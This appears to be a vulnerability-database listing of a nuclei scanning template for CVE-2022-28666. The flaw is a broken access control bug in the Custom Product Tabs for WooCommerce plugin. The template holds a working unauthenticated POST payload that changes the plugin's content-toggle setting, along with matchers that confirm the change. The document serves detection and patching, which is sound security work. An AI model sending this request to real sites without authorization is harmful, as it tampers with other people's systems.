
Custom Product Tabs for WooCommerce < 1.7.8 - Unauthenticated Toggle Content Setting Update

šŸ—“ļøĀ 03 Jul 2026Ā 03:01:05Reported byĀ ProjectDiscoveryTypeĀ 
nuclei
Ā nuclei
šŸ”—Ā github.comšŸ‘Ā 15Ā Views

Unauthenticated users can update the content toggle setting in Custom Product Tabs for WooCommerce versions below 1.7.8.

Code
id: CVE-2022-28666

info:
  name: Custom Product Tabs for WooCommerce < 1.7.8 - Unauthenticated Toggle Content Setting Update
  author: Sourabh-Sahu
  severity: medium
  description: |
    YIKES Inc. Custom Product Tabs for WooCommerce plugin <= 1.7.7 contains a broken access control vulnerability caused by improper permission checks in &yikes-the-content-toggle option update, letting attackers modify content without authorization.
  impact: |
    Attackers can modify product tab content without authorization, potentially leading to content tampering or misinformation.
  remediation: |
    Update to the latest version of the plugin, above 1.7.7.
  reference:
    - https://wpscan.com/vulnerability/2f20e14b-3a97-41c5-a3ce-054ed2450aa3/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
    cvss-score: 5.3
    cve-id: CVE-2022-28666
    epss-score: 0.01226
    epss-percentile: 0.65162
    cwe-id: CWE-287
    cpe: cpe:2.3:a:yikesinc:custom_product_tabs_for_woocommerce:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    publicwww-query: "yikes-inc-easy-custom"
  tags: cve,cve2022,wordpress,wp-plugin,wp,custom_product_tabs_for_woocommerce,vkev,intrusive

http:
  - raw:
      - |
        POST /wp-json/yikes/cpt/v1/settings HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: XMLHttpRequest

        toggle_the_content=false

    matchers:
      - type: dsl
        dsl:
          - "contains_all(body, 'success','Settings updated')"
          - "contains(content_type, 'application/json')"
          - "status_code == 200"
        condition: and
# digest: 4a0a004730450221009a95f1621d4f7a9eda11040385cd5af4197794606361500ec115ad02dc50b78002205fc27fe93f993a921f11e3a40dc4b21264c3a383d68e253e350641c422b00b90:922c64590222798bb761d5b6d8e72950


04 Feb 2026 07:00 (current)
Vulners AI Score: 6.1 (Medium risk)
CVSS 3.1: 5.3
EPSS: 0.01226